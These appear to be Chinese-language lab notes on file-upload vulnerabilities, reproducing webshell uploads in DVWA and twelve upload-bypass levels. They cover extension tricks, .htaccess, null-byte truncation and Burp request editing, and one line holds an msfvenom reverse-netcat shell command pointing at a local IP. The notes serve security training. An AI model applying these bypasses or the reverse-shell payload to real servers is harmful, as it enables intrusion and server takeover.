文件上传漏洞危害
1服务器文件被外界浏览导致信息泄露
2恶意脚本被任意执行(篡改网站,执行非法操作,攻击其他网站等.....)
文件上传实验复现:
菜刀和反弹shell的复现
首先上传小马在dvwa
直接菜刀切入验证添加终端
反弹shell
首先上传反弹小马
传参dir测试有被解析
生成反弹木马:msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.2.137 LPROT=5678
(未完成)。。。。。。。。。。
pass1
删除上传页面的js事件
成功上传phpinfo测试页
验证
pass2
打开源码看到后端允许上传的文件类型抓取数据包更改为对应的其中一种放行请求
pass3
同pass2更改文件后缀传入目录
解析需要注意使用include.php?file=
pass4
可利用两种方式一种为黑名单过滤板之外的文件名phps
另一种利用 .htaccess(条件苛刻apache配置有AllowOverride All)
编写文件.h文件
再把小马改为对应的名字‘aa.jpg’上传即可
pass5抓包利用双写文件漏洞上传
pass5 ‘s’
pass6 改包文件名‘.phps’
pass7 改包文件名首尾加空格
pass8 抓包文件名结尾加“.”’
pass9改包名双写绕过“pphphp”
pass10双写“php”或者后缀“. .”
pass11双写“php”为pphphp
pass12:00截断的应用
先拦包发送到burp的重发器页面再修改头部请求字段